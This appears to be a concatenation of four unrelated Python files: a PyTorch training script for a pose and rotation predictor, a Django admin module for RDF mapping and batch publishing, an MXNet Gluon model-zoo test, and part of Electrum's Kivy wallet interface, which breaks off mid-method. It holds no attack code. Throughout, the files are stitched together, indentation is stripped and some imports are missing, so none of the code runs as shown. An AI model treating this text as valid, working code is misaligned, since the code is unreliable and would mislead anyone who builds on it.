from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from utils.builders import SingleViewDepthTripletBuilder, MultiViewDepthTripletBuilder, MultiViewTripletBuilder, SingleViewTripletBuilder
from utils.builder_utils import distance, Logger, ensure_folder, collate_fn, time_stamped
from utils.vocabulary import Vocabulary
from ipdb import set_trace
from sklearn.preprocessing import OneHotEncoder
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchvision import transforms
import torchvision.utils as vutils
import torchvision.models as models
from torchvision import datasets
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
from shutil import copy2
import importlib
from pyquaternion import Quaternion
from models.pose_predictor_euler import define_model
from utils.plot_utils import plot_mean
from utils.rot_utils_old import create_rot_from_vector, rotationMatrixToEulerAngles, \
isRotationMatrix, eulerAnglesToRotationMatrix, \
norm_sincos, sincos2rotm
from utils.network_utils import loss_rotation, loss_euler_reparametrize, loss_axisangle, batch_size, apply,\
loss_quat, loss_quat_single, euler_XYZ_to_reparam
from utils.plot_utils import plot_mean
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]= "1,2,3"
IMAGE_SIZE = (299, 299)
NUM_VIEWS = 1
SAMPLE_SIZE = 30
VAL_SEQS = 5
TRAIN_SEQS_PER_EPOCH = 50
LOSS_FN = loss_euler_reparametrize
EXP_ROOT_DIR = '/media/hdd/msieb/data/tcn_data/experiments'
sys.path.append(EXP_ROOT_DIR)
class Trainer(object):
def __init__(self, use_cuda, load_model, model_folder, train_directory, validation_directory, builder, loss_fn, args, multi_gpu=True):
self.use_cuda = use_cuda
self.load_model = load_model
self.model_folder = model_folder
self.validation_directory = validation_directory
self.train_directory = train_directory
self.args = args
self.builder = builder
self.loss_fn = loss_fn
self.logdir = join(model_folder, 'logs')
self.writer = SummaryWriter(self.logdir)
self.logger = Logger(self.args.log_file)
self.itr = 0
# Create Model
self.model = self.create_model()
if multi_gpu:
self.model = torch.nn.DataParallel(self.model, device_ids=range(torch.cuda.device_count()))
# Build validation set
validation_builder = builder(self.args.n_views, validation_directory, IMAGE_SIZE, self.args, sample_size=SAMPLE_SIZE)
validation_set = [validation_builder.build_set() for i in range(VAL_SEQS)]
validation_set = ConcatDataset(validation_set)
self.len_validation_set = len(validation_set)
del validation_builder
self.validation_loader = DataLoader(
validation_set,
batch_size=8,
shuffle=False,
pin_memory=self.use_cuda,
)
self.validation_calls = 0
# Build Training Set
self.triplet_builder = builder(self.args.n_views, \
train_directory, IMAGE_SIZE, self.args, sample_size=SAMPLE_SIZE)
self.training_queue = multiprocessing.Queue(1)
dataset_builder_process = multiprocessing.Process(target=self.build_set, args=(self.training_queue, self.triplet_builder, self.logger), daemon=True)
dataset_builder_process.start()
# Get Logger
# Model specific setup
self.optimizer = optim.SGD(self.model.parameters(), lr=self.args.lr_start, momentum=0.9)
# This will diminish the learning rate at the milestones ///// 0.1, 0.01, 0.001 if not using automized scheduler
self.learning_rate_scheduler = lr_scheduler.ReduceLROnPlateau(self.optimizer, 'min')
# self.criterion = nn.CrossEntropyLoss()
def train(self):
trn_losses_ = []
val_losses_= []
val_acc_ = []
trn_acc_ = []
for epoch in range(self.args.start_epoch, self.args.start_epoch + self.args.epochs):
print("=" * 20)
self.logger.info("Starting epoch: {0} ".format(epoch))
dataset = self.training_queue.get()
data_loader = DataLoader(
dataset=dataset,
batch_size=self.args.minibatch_size, # batch_size(epoch, self.args.max_minibatch_size),
shuffle=True,
pin_memory=self.use_cuda,
)
train_embedding_features_buffer = []
train_images_buffer = []
correct = 0
for _ in range(0, 1):
losses = []
for minibatch in data_loader:
if self.use_cuda:
anchor_frames = minibatch[0].cuda()
#anchor_euler_reparam = minibatch[1].cuda() # load as 3x3 rotation matrix
anchor_rots = minibatch[1].cuda() # load as 3x3 rotation matrix
# frames = Variable(minibatch)
loss, a_pred = self.loss_fn(self.model, anchor_frames, anchor_rots)
losses.append(loss.data.cpu().numpy())
anchor_euler = euler_XYZ_to_reparam(apply(rotationMatrixToEulerAngles, anchor_rots))
correct += (torch.norm(a_pred - anchor_euler, 2) < 0.1).data.cpu().numpy().sum() # print(gradcheck(loss_fn, (tcn, minibatch,)))
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
# Add embeddings
train_embedding_features_buffer.append(apply(rotationMatrixToEulerAngles, anchor_rots))
train_images_buffer.append(anchor_frames)
print("logging to {}".format(self.logdir))
self.writer.add_scalar('data/train_loss', np.mean(losses), self.itr)
self.writer.add_scalar('data/train_correct', correct / len(data_loader), self.itr)
self.itr += 1
trn_losses_.append(np.mean(losses))
self.logger.info('train loss: ', np.mean(losses))
self.logger.info("Training score correct {correct}/{total}".format(
correct=correct,
total=len(data_loader)
))
trn_acc_.append(correct)
self.writer.add_image('frame_1', minibatch[0][0], self.itr)
# Get embeddings
features = torch.cat(train_embedding_features_buffer[:30]).squeeze_()
# features = train_embedding_features_buffer.view(train_embedding_features_buffer.shape[0]*train_embedding_features_buffer.shape[1], -1)
# label = torch.Tensor(np.asarray(label_buffer))
images = torch.cat(train_images_buffer[:30]).squeeze_()#/255.0, [0, 3, 1, 2]
self.writer.add_embedding(features, label_img=images, global_step=epoch)
if epoch % 1 == 0:
loss, correct = self.validate()
self.learning_rate_scheduler.step(loss)
val_losses_.append(loss)
val_acc_.append(correct)
if epoch % self.args.save_every == 0 and epoch != 0:
self.logger.info('Saving model.')
self.save_model(self.model, self.model_filename(self.args.model_name, epoch), join(self.model_folder, 'weight_files'))
print("logging to {}".format(self.logdir))
plot_mean(trn_losses_, self.model_folder, 'train_loss')
plot_mean(val_losses_, self.model_folder, 'validation_loss')
plot_mean(trn_acc_, self.model_folder, 'train_acc')
plot_mean(val_acc_, self.model_folder, 'validation_accuracy')
# plot_mean(val_acc_no_margin_, self.model_folder, 'validation_accuracy_no_margin')
def validate(self):
# Run model on validation data and log results
correct = 0
losses = []
for minibatch in self.validation_loader:
if self.use_cuda:
anchor_frames = minibatch[0].cuda()
#anchor_euler_reparam = minibatch[1].cuda() # load as 3x3 rotation matrix
anchor_rots = minibatch[1].cuda() # load as 3x3 rotation matrix
loss, a_pred = self.loss_fn(self.model, anchor_frames, anchor_rots)
losses.append(loss.data.cpu().numpy())
anchor_euler = euler_XYZ_to_reparam(apply(rotationMatrixToEulerAngles, anchor_rots))
correct += (torch.norm(a_pred - anchor_euler, 2) < 0.1).data.cpu().numpy().sum()
self.writer.add_scalar('data/valid_loss', np.mean(losses), self.validation_calls)
self.writer.add_scalar('data/validation_correct', correct / self.len_validation_set, self.validation_calls)
self.validation_calls += 1
loss = np.mean(losses)
self.logger.info("Validation score correct {correct}/{total}".format(
correct=correct,
total=self.len_validation_set
))
self.logger.info('val loss: ',loss)
return loss, correct
def model_filename(self, model_name, epoch):
return "{model_name}-epoch-{epoch}.pk".format(model_name=model_name, epoch=epoch)
def save_model(self, model, filename, model_folder):
ensure_folder(model_folder)
model_path = os.path.join(model_folder, filename)
torch.save(model.state_dict(), model_path)
def build_set(self, queue, triplet_builder, log):
while 1:
datasets = []
for i in range(TRAIN_SEQS_PER_EPOCH):
dataset = triplet_builder.build_set()
datasets.append(dataset)
dataset = ConcatDataset(datasets)
# log.info('Created {0} triplets'.format(len(dataset)))
queue.put(dataset)
def create_model(self):
model = define_model(pretrained=True)
# model = PosNet()
if self.load_model:
model_path = os.path.join(
self.model_folder,
self.load_model
)
# map_location allows us to load models trained on cuda to cpu.
model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
if self.use_cuda:
model = model.cuda()
return model
def batch_size(self, epoch, max_size):
exponent = epoch // 100
return min(max(2 ** (exponent), 2), max_size)
def main(args):
# module = importlib.import_module(args.exp_name + '.config')
# conf = getattr(module, 'Config_Isaac_Server')()
# EXP_DIR = conf.EXP_DIR
# MODEL_FOLDER = conf.MODEL_FOLDER
# GPU Configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
use_cuda = torch.cuda.is_available()
# Load model
model_folder = join(EXP_ROOT_DIR, args.exp_name, 'trained_models', args.run_name, time_stamped())
if not os.path.exists(model_folder):
os.makedirs(model_folder)
# Get data loader builder and loss function
builder = getattr(importlib.import_module('utils.builders'), args.builder)
loss_fn = LOSS_FN
# Define train and validation directories
train_directory = join(EXP_ROOT_DIR, args.exp_name, 'videos/train/')
validation_directory = join(EXP_ROOT_DIR, args.exp_name, 'videos/valid/')
# Copies of executed config
if not os.path.exists('/'.join(os.path.realpath(__file__).split('/')[:-1]) + '/experiments'):
os.makedirs('/'.join(os.path.realpath(__file__).split('/')[:-1]) + '/experiments')
copy2('/'.join(os.path.realpath(__file__).split('/')[:-1]) + '/train_tcn_no_captions.py', model_folder)
copy2('/'.join(os.path.realpath(__file__).split('/')[:-2]) + '/gps-lfd' + '/config.py', model_folder)
# Build training class
trainer = Trainer(use_cuda, args.load_model, model_folder, train_directory, validation_directory, builder, loss_fn, args)
trainer.train()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--start-epoch', type=int, default=0)
parser.add_argument('--epochs', type=int, default=1000)
parser.add_argument('--save-every', type=int, default=10)
parser.add_argument('--load-model', type=str, required=False)
parser.add_argument('--minibatch-size', type=int, default=8)
parser.add_argument('--model-name', type=str, default='tcn')
parser.add_argument('--log-file', type=str, default='./out.log')
parser.add_argument('--lr-start', type=float, default=0.001)
parser.add_argument('--n-views', type=int, default=NUM_VIEWS)
parser.add_argument('--alpha', type=float, default=0.01, help='weighing factor of language loss to triplet loss')
# Model parameters
# Path parameters
parser.add_argument('--exp-name', type=str, required=True)
parser.add_argument('--run-name', type=str, required=True)
parser.add_argument('--builder', type=str, required=True)
args = parser.parse_args()
print(args)
main(args)
|
admin.py | from .models import *
from django.contrib import admin
from django.db.models import Q
from django.contrib.contenttypes.models import ContentType
from .views import *
from django import forms
#from django.contrib.admin.widgets import SelectWidget
from django.utils.safestring import mark_safe
from django.contrib import messages
from django.shortcuts import render
from django.http import HttpResponseRedirect, HttpResponse
class GenericMetaPropInline(admin.TabularInline):
model = GenericMetaProp
# readonly_fields = ('slug','created')
#fields = ('code','namespace')
# related_search_fields = {'label' : ('name','slug')}
extra=1
def publish_set_background(queryset,model,check,mode,logf):
from django.core.files import File
import time
with open(logf,'w') as f:
proclog = File(f)
f.write("Publishing %s %ss in mode %s at %s<BR>" % ( str(len(queryset)), model, mode, time.asctime()))
for msg in publish_set(queryset,model,check,mode):
if( msg.startswith("Exception") ):
em = "<strong>"
emend = "</strong>"
else:
em = ""
emend = ""
f.write("".join(("<LI>",em,msg,emend,"</LI>")))
f.flush()
f.write ("<BR> publish action finished at %s<BR>" % ( time.asctime(),))
def publish_set_action(queryset,model,check=False,mode='PUBLISH'):
import threading
from django.conf import settings
import os
import time
timestr = time.strftime("%Y%m%d-%H%M%S")
logfname = '{}_batch_publish_{}.html'.format(model,timestr)
try:
logf = os.path.join(settings.BATCH_RDFPUB_LOG, logfname)
except:
logf = os.path.join(settings.STATIC_ROOT if settings.STATIC_ROOT else '' ,logfname)
t = threading.Thread(target=publish_set_background, args=(queryset,model,check,mode,logf), kwargs={})
t.setDaemon(True)
t.start()
return "/static/" + logfname
def force_prefix_use(modeladmin, request, queryset):
""" update selected Metaprops to use CURIE form with registered prefix """
for obj in queryset.all() :
obj.save()
force_prefix_use.short_description = "update selected Metaprops to use CURIE form with registered prefix"
class GenericMetaPropAdmin(admin.ModelAdmin):
search_fields = ['propname' ]
actions= [force_prefix_use]
pass
class ObjectTypeAdmin(admin.ModelAdmin):
pass
class AttributeMappingInline(admin.TabularInline):
model = AttributeMapping
# readonly_fields = ('slug','created')
#fields = ('code','namespace')
# related_search_fields = {'label' : ('name','slug')}
extra=1
class EmbeddedMappingInline(admin.TabularInline):
model = EmbeddedMapping
# readonly_fields = ('slug','created')
#fields = ('code','namespace')
# related_search_fields = {'label' : ('name','slug')}
extra=1
class ChainedMappingInline(admin.TabularInline):
model = ChainedMapping
fk_name='scope'
# readonly_fields = ('slug','created')
fields = ('attr','predicate','chainedMapping')
# related_search_fields = {'label' : ('name','slug')}
extra=1
class ObjectMappingAdmin(admin.ModelAdmin):
search_fields = ['content_type__name' ]
inlines = [ AttributeMappingInline, ChainedMappingInline, EmbeddedMappingInline]
filter_horizontal = ('obj_type',)
pass
class AttributeMappingAdmin(admin.ModelAdmin):
pass
class EmbeddedMappingAdmin(admin.ModelAdmin):
pass
class NamespaceAdmin(admin.ModelAdmin):
list_display = ('uri','prefix','notes')
fields = ('uri','prefix','notes')
search_fields = ['uri','prefix' ]
# related_search_fields = {'concept' : ('pref_label','definition')}
#list_editable = ('name','slug')
search_fields = ['uri','prefix']
class ConfigVarAdmin(admin.ModelAdmin):
pass
class ResourceMetaInline(admin.TabularInline):
model = ResourceMeta
verbose_name = 'Additional property'
verbose_name_plural = 'Additional properties'
# list_fields = ('pref_label', )
show_change_link = True
max_num = 20
fields = ('subject','metaprop','value')
# list_display = ('pref_label',)
extra = 1
IR = ContentType.objects.get_for_model(ImportedResource)
class ImportedResourceAdmin(admin.ModelAdmin):
list_display = ('description', 'subtype', '__unicode__')
search_fields = ['description','file','remote']
inlines = [ ResourceMetaInline , ]
actions= ['publish_options', ]
resourcetype = 'importedresource'
def get_queryset(self, request):
qs = super(ImportedResourceAdmin, self).get_queryset(request)
# import pdb; pdb.set_trace()
return qs.filter(Q(subtype__isnull=True) | Q(subtype=IR ))
def publish_options(self,request,queryset):
"""Batch publish with a set of mode options"""
if 'apply' in request.POST:
# The user clicked submit on the intermediate form.
# Perform our update action:
if request.POST.get('mode') == "CANCEL" :
self.message_user(request,
"Cancelled publish action")
else:
checkuri = 'checkuri' in request.POST
logfile= publish_set_action(queryset,self.resourcetype,check=checkuri,mode=request.POST.get('mode'))
self.message_user(request,
mark_safe('started publishing in {} mode for {} {}s at <A HREF="{}" target="_log">{}</A>'.format(request.POST.get('mode'),queryset.count(),self.resourcetype, logfile,logfile) ) )
return HttpResponseRedirect(request.get_full_path())
return render(request,
'admin/admin_publish.html',
context={'schemes':queryset,
'pubvars': ConfigVar.getvars('PUBLISH') ,
'reviewvars': ConfigVar.getvars('REVIEW') ,
})
class ObjectBoundListFilter(admin.SimpleListFilter):
title='Chain Start by Object Type'
parameter_name = 'objtype'
def lookups(self, request, model_admin):
chains = ServiceBinding.objects.filter(object_mapping__content_type__isnull=False)
return set([(c.object_mapping.first().content_type.model, c.object_mapping.first().content_type.model) for c in chains])
def queryset(self, request, qs):
try:
#import pdb; pdb.set_trace()
if request.GET.get('objtype') :
qs= qs.filter(object_mapping__content_type__model = request.GET.get('objtype'))
except:
pass
return qs
class ChainListFilter(admin.SimpleListFilter):
title='Chain members'
parameter_name = 'chain_id'
def lookups(self, request, model_admin):
chains = ServiceBinding.objects.filter(object_mapping__name__isnull=False)
return [(c.id, c.object_mapping.first().name) for c in chains]
def queryset(self, request, qs):
try:
pass
#qs= qs.filter(object_mapping__id = request.GET.get('chain_id'))
except:
pass
return qs
class NextChainWidget( forms.Select):
def render(self, name, value, attrs=None):
self.choices = self.form_instance.fields['next_service'].choices
s = super(forms.Select, self).render(name, value, attrs)
h="<BR/>"
ind= "-> {}<BR/>"
for next in self.form_instance.instance.next_chain():
h = h+ ind.format( str(next))
ind = "--" + ind
return mark_safe(s+ h )
class ServiceBindingAdminForm (forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ServiceBindingAdminForm, self).__init__(*args, **kwargs)
self.fields['next_service'].widget = NextChainWidget()
self.fields['next_service'].widget.form_instance = self
class ServiceBindingAdmin(admin.ModelAdmin) :
list_display = ('title', 'binding_type', 'object_mapping_list')
list_filter=(ObjectBoundListFilter,ChainListFilter,'binding_type')
search_fields = ['title','binding_type']
form = ServiceBindingAdminForm
pass
admin.site.register(Namespace, NamespaceAdmin)
admin.site.register(GenericMetaProp,GenericMetaPropAdmin)
admin.site.register(ObjectType, ObjectTypeAdmin)
admin.site.register(ObjectMapping, ObjectMappingAdmin)
#admin.site.register(AttributeMapping, AttributeMappingAdmin)
#admin.site.register(EmbeddedMapping, EmbeddedMappingAdmin)
admin.site.register(ImportedResource, ImportedResourceAdmin)
admin.site.register(ServiceBinding, ServiceBindingAdmin)
admin.site.register(ConfigVar, ConfigVarAdmin) |
test_gluon_model_zoo.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@pytest.mark.parametrize('model_name', [
'resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25'
])
def test_models(model_name):
pretrained_to_test = set(['mobilenetv2_0.25'])
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
